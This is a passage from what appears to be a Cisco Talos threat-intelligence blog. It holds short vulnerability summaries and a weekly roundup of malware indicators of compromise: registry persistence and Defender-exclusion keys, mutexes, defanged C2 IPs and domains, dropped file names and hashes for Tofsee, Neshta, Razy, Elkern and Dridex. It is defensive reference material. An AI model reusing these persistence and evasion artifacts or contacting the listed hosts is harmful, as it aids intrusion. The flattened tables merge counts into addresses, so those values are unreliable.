                  Description: Cisco Talos recently discovered multiple vulnerabilities in the Nest Cam IQ Indoor camera. One of Nest Labs’ most advanced internet-of-things devices, the Nest Cam IQ Indoor integrates Security-Enhanced Linux in Android, Google Assistant, and even facial recognition all into a compact security camera. It primarily uses the Weave protocol for setup and initial communications with other Nest devices over TCP, UDP, Bluetooth and 6lowpan. Most of these vulnerabilities lie in the weave binary of the camera, however, there are some that also apply to the weave-tool binary. It is important to note that while the weave-tool binary also lives on the camera and is vulnerable, it is not normally exploitable as it requires a local attack vector (i.e. an attacker-controlled file) and the vulnerable commands are never directly run by the camera.
                  Snort SIDs: 49843 - 49855, 49797, 49798, 49801 - 49804, 49856, 49857, 49813 - 49816, 49912 (Written by Josh Williams)

                  Title: Aspose APIs contain bugs that could lead to remote code execution
                  Description: Cisco Talos recently discovered multiple remote code execution vulnerabilities in various Aspose APIs. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs, Microsoft Word files and more. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API.
                  Snort SIDs: 49756, 49757, 49760, 49761, 49852, 49853 (Written by Cisco Talos analysts)

                  Most prevalent malware files this week

                  SHA 256: b22eaa5c51f0128d5e63a67ddf44285010c05717e421142a3e59bba82ba1325a  
                  MD5: 125ef5dc3115bda09d2cef1c50869205
                  Typical Filename: helpermcp
                  Claimed Product: N/A
                  Detection Name: PUA.Osx.Trojan.Amcleaner::sbmt.talos  

                  SHA 256: 8c0b271744bf654ea3538c6b92aa7bb9819de3722640796234e243efc077e2b6
                  MD5: f7145b132e23e3a55d2269a008395034  
                  Typical Filename: 8c0b271744bf654ea3538c6b92aa7bb9819de3722640796234e243efc077e2b6.bin
                  Claimed Product: N/A
                  Detection Name: Unix.Exploit.Lotoor::other.talos

                  SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510  
                  MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                  Typical Filename: xme64-2141.exe
                  Claimed Product: N/A
                  Detection Name: W32.7ACF71AFA8-95.SBX.TG

                  SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f  
                  MD5: e2ea315d9a83e7577053f52c974f6a5a
                  Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin
                  Claimed Product: N/A
                  Detection Name: W32.AgentWDCR:Gen.21gn.1201

                  SHA 256:46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08  
                  MD5: db69eaaea4d49703f161c81e6fdd036f
                  Typical Filename: invoice.exe
                  Claimed Product: N/A
                  Detection Name: W32.46B241E3D3-95.SBX.TG 

                  Threat Roundup for August 16 to August 23

                  $
                  0
                  0
                  Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 16 and Aug. 23. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

                  As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

                  For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
                  The most prevalent threats highlighted in this roundup are:

                  Threat NameTypeDescription
                  Win.Trojan.Tofsee-7131053-0 Trojan Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.
                  Win.Virus.Neshta-7131041-0 Virus Neshta is file-infecting malware that also collects sensitive information from an infected machine and sends it to a C2 server.
                  Win.Trojan.Razy-7124013-0 Trojan Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
                  Win.Malware.Elkern-7118026-1 Malware Elkern is a worm that spreads via peer-to-peer networks by masquerading as popular movies, games, or software. Once executed, it installs follow-on malware onto the system.
                  Win.Packed.Xcnfe-7131484-0 Packed This cluster provides generic detection for the Dridex banking trojan that's downloaded onto a target's machine.
                  Win.Worm.Vobfus-7123957-0 Worm Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its C2 server.

                  Threat Breakdown

                  Win.Trojan.Tofsee-7131053-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config1
                  28
                  <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config3
                  28
                  <HKU>\.DEFAULT\CONTROL PANEL\BUSES 28
                  REGISTRY\USER\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config0
                  28
                  REGISTRY\USER\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config1
                  28
                  REGISTRY\USER\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config2
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: Type
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: Start
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: ErrorControl
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: DisplayName
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: WOW64
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: ObjectName
                  28
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: Description
                  28
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\fymsrzfu
                  5
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\buionvbq
                  4
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\slzfemsh
                  2
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\yrflksyn
                  2
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\dwkqpxds
                  2
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\athnmuap
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\kdrxwekz
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\wpdjiqwl
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\tmagfnti
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\zsgmltzo
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\lesyxfla
                  1
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  239[.]255[.]255[.]25028
                  69[.]55[.]5[.]25028
                  46[.]4[.]52[.]10928
                  176[.]111[.]49[.]4328
                  85[.]25[.]119[.]2528
                  144[.]76[.]199[.]228
                  144[.]76[.]199[.]4328
                  43[.]231[.]4[.]728
                  192[.]0[.]47[.]5928
                  95[.]181[.]178[.]1728
                  211[.]231[.]108[.]4725
                  64[.]233[.]186[.]2725
                  172[.]217[.]197[.]2725
                  98[.]136[.]96[.]7425
                  172[.]217[.]5[.]22824
                  67[.]195[.]228[.]11023
                  173[.]194[.]66[.]2723
                  209[.]85[.]203[.]2723
                  207[.]69[.]189[.]22922
                  98[.]137[.]157[.]4322
                  213[.]205[.]33[.]6322
                  98[.]136[.]96[.]7722
                  23[.]160[.]0[.]10821
                  98[.]136[.]96[.]7321
                  188[.]125[.]72[.]7321
                  *See JSON for more IOCs
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  250[.]5[.]55[.]69[.]in-addr[.]arpa28
                  250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org28
                  250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org28
                  250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net28
                  whois[.]iana[.]org28
                  250[.]5[.]55[.]69[.]bl[.]spamcop[.]net28
                  whois[.]arin[.]net28
                  eur[.]olc[.]protection[.]outlook[.]com28
                  250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org28
                  microsoft-com[.]mail[.]protection[.]outlook[.]com28
                  honeypus[.]rusladies[.]cn28
                  marina99[.]ruladies[.]cn28
                  sexual-pattern3[.]com28
                  coolsex-finders5[.]com28
                  mta5[.]am0[.]yahoodns[.]net27
                  smtp[.]secureserver[.]net25
                  mx-eu[.]mail[.]am0[.]yahoodns[.]net25
                  mx-aol[.]mail[.]gm0[.]yahoodns[.]net25
                  mx1[.]emailsrvr[.]com25
                  hotmail-com[.]olc[.]protection[.]outlook[.]com25
                  hotmail[.]de24
                  mx1[.]hanmail[.]net24
                  hanmail[.]net23
                  mx6[.]earthlink[.]net22
                  msx-smtp-mx1[.]hinet[.]net22
                  *See JSON for more IOCs
                  Files and or directories createdOccurrences
                  %SystemRoot%\SysWOW64\config\systemprofile28
                  %SystemRoot%\SysWOW64\config\systemprofile:.repos28
                  %TEMP%\<random, matching '[a-z]{8}'>.exe28
                  %SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>28
                  %System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)5
                  %TEMP%\utjfmin.exe1
                  %TEMP%\jiyubxc.exe1
                  %TEMP%\dcsovrw.exe1
                  %TEMP%\rqgcjfk.exe1

                  File Hashes

                  0009a9ca6636ab37f4c3f21f19741971f5900ae4b18381e7695962a4d4e6f811 013bec317dbcead53cdedaa23feb802e1f2b4e74e016cdff7e39490d22adab30 015ad805d24234339ca8e9f1402c7bcaa1493cefb13f61f3442873fd8f31df97 04d5f2b852d6e9602612ed5b58becccd1eff5e0a8d53671bb3a2209a36ad4a79 059bbb4be73dd7b7055687f9ae779598b2327d61f49b2367ac129685577c8e8b 080b33f9d842b08d082b40f3c49ab9b6727ae47ad154e7c65ee45775d6750693 1348df977c70b9b0ff8cf904c4bd96cbcd58aa332db5c448a63259a1cc7909b2 13e5a8542f77eb807e805cf136d489350d2976af8164c4e9b5daeacdefb4b0f9 16befc710825960d79ccb4f7a2ed12a399e7c4d457e11d141163882e6c6d246e 187746b5d8d8627e46781d34167c08a018ad8a31d2f50033d723d3244c7aad41 1c5da4a767bf010a4eb2ffa39b939f65c21a1dad6b2c40de8fe71db6b5cefab9 1cf13ba4a00fc7dbb79d2e47c2a56c35518494652989cb1a5e932ec676019bb6 1e3f0775aa3feea8393b3073e34fbb0b00b1306cce374fbef5018d7d79a8f556 269b04eaee60cae3fe4428292be87a81561ea94a4a0df7cab400b15411566415 27681e2fb23e38cfcd21dd751d79ac47a866655ae259131e05566ad1be8611e0 280d20ee6383ebe642253f076e194831c53396f9e7d33567054411cd6b167a50 288084927b8287de4320b026474cfcf01270bc2eb63f40cad82a2a95be4acab0 28b7e0c90f7664f834f7adbee912f1f1efc769132d419b16572cbeeba5c6d724 29100329861dd3e48acc75d9ccb0faaf852e44158538db71ccc569df5e84507e 2996e60bf4ef30b47ddb32ee6ea23603bc266562913be0add727791bd2261234 29f84ea78abaf727817f2d2126ccbec9554ec32550897e28e20dd6ac3f9a038e 2b77064e3de89e494664d588ea3c1fd3f7d3863babbc919769d13187250c395c 2ce0b071b4465e9e383c3ce3df2d100cf5e7cc96a12b25e861e7d88d4be77cdf 2ec24ae1e990a9abadb6d5393089a39c4c570d5f138c3651a66daf336b519598 31fb8cfa6e434122f5a2817d33a2d509f0adc23577771d11ab9ad7682ed7bd41
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella




                  Win.Virus.Neshta-7131041-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\CLASSES\EXEFILE\SHELL\OPEN\COMMAND 11
                  MutexesOccurrences
                  MutexPolesskayaGlush*.*svchost.comexefile\shell\open\command‹À "%1" %*œ‘@11
                  Files and or directories createdOccurrences
                  \MSOCache\ALLUSE~1\{90140~1\DW20.EXE11
                  \MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe11
                  \MSOCache\ALLUSE~1\{91140~1\ose.exe11
                  \MSOCache\ALLUSE~1\{91140~1\setup.exe11
                  %TEMP%\tmp5023.tmp11
                  %SystemRoot%\svchost.com11
                  %HOMEPATH%\APPLIC~1\Adobe\Reader\9.2\ARM\ARMUPD~1\AdobeARM.exe11
                  %HOMEPATH%\APPLIC~1\Adobe\Reader\9.2\ARM\ARMUPD~1\READER~1.EXE11
                  %HOMEPATH%\APPLIC~1\Adobe\Setup\{AC76B~1\Setup.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000050.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000053.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000059.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000060.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000066.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000067.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000070.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000071.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000074.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000073.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000114.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000115.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000116.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000118.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000119.exe11
                  \SYSTEM~1\_RESTO~1\RP1\A0000120.exe11
                  *See JSON for more IOCs

                  File Hashes

                  23e9f0d6be0f5ba18e787052e64fb7ec62410fab4ec8a3b5f11ec58e34dcf4d7 28996ba8b6dc0794260721cb26bbdc207b23af9352234f5eee0c61851c4a3811 397b969c83ad2e1c6efdb492e932ff8a111f0b1cab34f1409d1888784ad9ca6a 5a3535e2815f02762483cdd97b060cac4ec220e28f21ac42d332fc6281a2709e 63e9b564538a88cb7d06e75114ff1e3fc1cf07b973d5c2e74b114361699ba298 793529a8214ced18d6c43239ddc99b60b6cd3ac5055667e4c5878d65c4c24af7 88d1b872c821bd52be9f52677626b319307a316e9218547a66fb9c6597233aa0 9a8af062b9581de41c2fc10673a5760af539f0ad28b94b81bc5bfa4665ea843d ad15b25e0356c98ca1679abcf41d12ab2a3869f0e7aad18d169c72af55bcb502 f988cbba1b43f688839a203e0916e3e11861df7581c4fc770ead93a63f584c44 fd5476414674ca6a58296181ce38fe772ed7c76cd9cfe026b19e194da43787b0

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Trojan.Razy-7124013-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\SECDESC 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\SID 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\PRIVILGS 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\SECDESC 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\SID 32
                  <HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\PRIVILGS 32
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO
                  Value Name: pool_url
                  32
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO
                  Value Name: pool_pass
                  32
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Start Windows
                  32
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO 32
                  <HKLM>\SECURITY\RXACT
                  Value Name: Log
                  32
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO
                  Value Name: pool_user
                  32
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  94[.]100[.]186[.]11932
                  217[.]69[.]128[.]9932
                  88[.]99[.]142[.]16314
                  136[.]243[.]102[.]16712
                  94[.]130[.]143[.]16211
                  136[.]243[.]102[.]15410
                  78[.]46[.]49[.]2126
                  94[.]130[.]9[.]1946
                  136[.]243[.]88[.]1456
                  136[.]243[.]94[.]276
                  94[.]130[.]64[.]2255
                  136[.]243[.]102[.]1575
                  46[.]4[.]119[.]2085
                  176[.]9[.]147[.]1785
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  xmr[.]pool[.]minergate[.]com32
                  cloclo11[.]datacloudmail[.]ru32
                  cloclo16[.]datacloudmail[.]ru32
                  Files and or directories createdOccurrences
                  %APPDATA%\Lopatka\app.exe32
                  %APPDATA%\Lopatka\config.json32
                  %APPDATA%\Lopatka32
                  %System32%\config\SECURITY6
                  %System32%\config\SECURITY.LOG16

                  File Hashes

                  0137fc231e2d7e412a4e4ebbb670e732e47264034f9ec2493ecbd8000c2eb499 02ab00e9a675adb7b0fb711ba04f29abffe9774d9a79a12cde4041dd1ec81b0d 07ae413be994ec96a7d3e8202cf8917b8635bde5e3f4176dcd218d6cd713db72 088b3da558e94be8b010002638a54ad34edcc5e2557cad98ab0adbfff7ee887b 0bec1af49840202e3f08ee153839630bc15ca00be3c59947d3f34de189b33e43 0c44e2c58e9940b3fc9f2266fcf797e574a24dcf109e136703c37f6b3d0831e5 0c5ea4b44180db65a8833e4808abd600f4ddd2f1f637adf7f89c131aa0cfecff 0cee3e0769dd885c12ac6a214a85275a59bd98937e72e3d03847cfb6f257bd56 0f2b46d1ef3003c93ebddeb87f66e2fe64e338ed36ec868710367e112c36e495 1182ef3ba1044b9341ece945425ed1274e085f374fbbc48917a069de87e53fcc 11e9f442c1f1542f820ffbf23872bafbcfc8fdd2571ac29db34725cee402f3ef 128b0e52a319a8176898acb8561831a6287719202ad4f94dc94fd100ac582335 13b5035f6c4dbcd1a00b2868db39f95cae92b67457e07a208e5eb881d647d132 1839a13f2080086beefa122c5d855580d74059c5d6aba3e1c9759c1e851d092c 184ad59d217ed9d9564436c2f547dfda36250aebf2c29c1350263e506a241aec 1a4426dba7c2baffb9f678acd282e836c8701e497814f95d0c3fe8282e7f0235 1a8c8b017edebaf6f249bda6e91daaecb2b1e2dcbf37b72d5b23bad128fedd3a 1bf6eb53191201bbb8e6281fa417178e1a789f8435b30cf7366cf6bd8fdc3c43 20580370ad7f348ca8709df2da855bdfa2c779a25165b44ced3da6fc70c22d41 21198bdc5acdabc431021f78c6e983e56437b84287e1473431033bc86ba2dca1 2198063b30b7d7195fb574d56571c4f2a699100e34e7d731966fb6c9fc5e90a2 219bdf6c224824fbca243df963f5bb5c6253b56d72c7a2ccdba1af2d2b836172 2573687a28ed782e1df1d2473801c02880a893ef4ee3b2f9664740391818bdee 2d9eec16b891d142303841369dc5b353c2842f3bb623eeee706c7bb316d2bd04 37444d1e21872ad1aca34d764d217dd8ef53c2e199d9c90e296a13535cf06d51
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Malware.Elkern-7118026-1

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\WOW6432NODE\HP710C 32
                  Files and or directories createdOccurrences
                  %SystemRoot%\Temp\AIM Account Stealer Downloader.exe32
                  %SystemRoot%\Temp\AikaQuest3Hentai FullDownloader.exe32
                  %SystemRoot%\Temp\Battle.net key generator (WORKS!!).exe32
                  %SystemRoot%\Temp\Borland Delphi 6 Key Generator.exe32
                  %SystemRoot%\Temp\Britney spears nude.exe32
                  %SystemRoot%\Temp\CKY3 - Bam Margera World Industries Alien Workshop Full Downloader.exe32
                  %SystemRoot%\Temp\Cat Attacks Child Full Downloader.exe32
                  %SystemRoot%\Temp\DSL Modem Uncapper.exe32
                  %SystemRoot%\Temp\DivX.exe32
                  %SystemRoot%\Temp\GTA3 crack.exe32
                  %SystemRoot%\Temp\Gladiator FullDownloader.exe32
                  %SystemRoot%\Temp\Grand theft auto 3 CD1 crack.exe32
                  %SystemRoot%\Temp\Hack into any computer!!.exe32
                  %SystemRoot%\Temp\Hacking Tool Collection.exe32
                  %SystemRoot%\Temp\Half-life ONLINE key generator.exe32
                  %SystemRoot%\Temp\Half-life WON key generator.exe32
                  %SystemRoot%\Temp\How To Hack Websites.exe32
                  %SystemRoot%\Temp\Internet and Computer Speed Booster.exe32
                  %SystemRoot%\Temp\Jenna Jameson - Built For Speed Downloader.exe32
                  %SystemRoot%\Temp\KaZaA media desktop v2.0 UNOFFICIAL.exe32
                  %SystemRoot%\Temp\Key generator for all windows XP versions.exe32
                  %SystemRoot%\Temp\LordOfTheRings-FullDownloader.exe32
                  %SystemRoot%\Temp\MSN Password Hacker and Stealer.exe32
                  %SystemRoot%\Temp\Macromedia Flash 5.0 Full Downloader.exe32
                  %SystemRoot%\Temp\Macromedia key generator (all products).exe32
                  *See JSON for more IOCs

                  File Hashes

                  0b68f9af51bbf81c844c2918b585affdd9dd718b2947a561184773f67aeb1f6a 278cad9a78dbad1143db49335eb14979ea4d0ee92c57d2ee2d609174e64a9410 3de7e6becb18bcbc7b296570bedcde5298573aa173ab5b171e074837388e9009 4130a0b119e9ec6d19778832e4c46735be0dd0db1416804c3e812955422eb7aa 41e91ae33451c66142cd5a9a311eaf486a3120e6e5791b092ba0d6c5369488b5 44a2fe971055187936edd220bfd39b53d4a861f87dc26f571919b84ab97ee082 47e52b8ac3c6ff8f2dca34ad0956546c2bf6fa0402b284f2abcf68518a231c6c 4daf6f6578dd52f8622126e6aa602a34126971b27f8b3057fca64af77dcee47d 4ef1228ae3c74f4302f6e6310a76d2a927dcd3df449f0fd507447a0aba24f6e6 51c932a3be3232c21ad7c85b3a42bd69ac8c94b871d2d5ce71b5c7975c74bebb 53beca3b6a9f89775a63e5ac5cfc9bf19ec4ae0ef7610083c1d695fdcc1d3ccc 5ef82482de74c3c76c6ae5e84ed81a90467f2c893e9bdfbe15e0288629ed4bba 6074a512cdd562abd6b565d3d52b0623b699d1ae395fc5b636f287451d4b7d9b 60799126289b3b6cb6cc72c24c3dbfc047646915444ebe11c47be9153ae010a1 6a1421414241c9055b19ed82ff7017b867ec30d7dd958187d1c43470878b964c 6b7a03e862e6c5cf1a14ca0266fd6ab0dbc1919e7d3e8359929f48de3284bb57 6fbf4d256e79f5a00166750204384a7c0dbec8e506ed70e133f9661844563318 7dbcdde4d690e346735b7e282ae64e6f3c82ecf292aec7cf5936e1364d850293 7dc3a586bf6d1addc417169f1522f227cc546d49b3ff722bae8589380962a0fa 82855b7292f0db3a431b4aedf1b03ea39b043082ac31254bdc8201b4a597cf9b 8722a40d49f8dc67c85d9bf38e6a0c09f87141b1f1432a265e3bb465323ec196 890c5dd6a7ba3d245633fc9cc0ddc3710c4fbfbc2272889556b99e8e80fdf63d 9a5ae6f06d4db89fcb05f0aa434cabf8ca40c61523896a97ace25e86986bdcce 9e7a30c7ced797c5e329022a1557e2164bf790420ce08320c0b20cdc78937ad6 9e97a9bfb0e8e9b082f3c79146e3f34e2098de7404af807f6d90a62d48ff7e2e
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Packed.Xcnfe-7131484-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: trkcore
                  26
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                  Value Name: DisableTaskMgr
                  26
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
                  Value Name: CheckSetting
                  22
                  MutexesOccurrences
                  mxPWjmqQ8n1
                  tx0w71lvCy1
                  6exxyHtr5d1
                  G2HYsj3fFg1
                  JerlUkOuKL1
                  MiIl5jaHeB1
                  OaqotdMe7M1
                  SCmfJWJkxg1
                  UzS0XAm1fS1
                  dG6tI9ut6B1
                  3t5z9ncR4g1
                  Fnbk52Waor1
                  R6AEP2O20C1
                  UAZKOAGGs21
                  k9oOrGi0aX1
                  l5nsV9SyRF1
                  pyka6wxPfy1
                  xmZSk4nyco1
                  ATgpy0BqxR1
                  NnWRFLviWv1
                  Qjy3zaZyv91
                  agtFwXTy1f1
                  jReSCvTbxM1
                  jxvaMsSvTQ1
                  myY0J7QVPE1
                  *See JSON for more IOCs
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  172[.]217[.]10[.]7825
                  104[.]20[.]208[.]2114
                  104[.]20[.]209[.]2112
                  172[.]217[.]6[.]2061
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  pastebin[.]com26
                  www[.]ga1n8pm45j[.]com1
                  www[.]htoc9fu6lz[.]com1
                  www[.]d5spcpq7ma[.]com1
                  www[.]x9imtredft[.]com1
                  www[.]cv4ygugpgj[.]com1
                  www[.]gnzs22h5ae[.]com1
                  www[.]ctabhfeith[.]com1
                  www[.]1ditgmvebu[.]com1
                  www[.]fhgbysko8w[.]com1
                  www[.]svu9es1kaz[.]com1
                  www[.]mbke6vrdrw[.]com1
                  www[.]y428zntdqc[.]com1
                  www[.]pb1ymjotdh[.]com1
                  www[.]fvi6gtygop[.]com1
                  www[.]nacci0plbn[.]com1
                  www[.]tfbjnm8ss8[.]com1
                  www[.]bf3ktyulcd[.]com1
                  www[.]7hcgj1c7yi[.]com1
                  www[.]vgdxer8o9b[.]com1
                  www[.]efk8v7cwgz[.]com1
                  www[.]b2oes11vip[.]com1
                  www[.]kxzgxtsgzo[.]com1
                  www[.]bqwdgq9z5o[.]com1
                  www[.]9ryvqouwz2[.]com1
                  *See JSON for more IOCs
                  Files and or directories createdOccurrences
                  <malware cwd>\old_<malware exe name>26

                  File Hashes

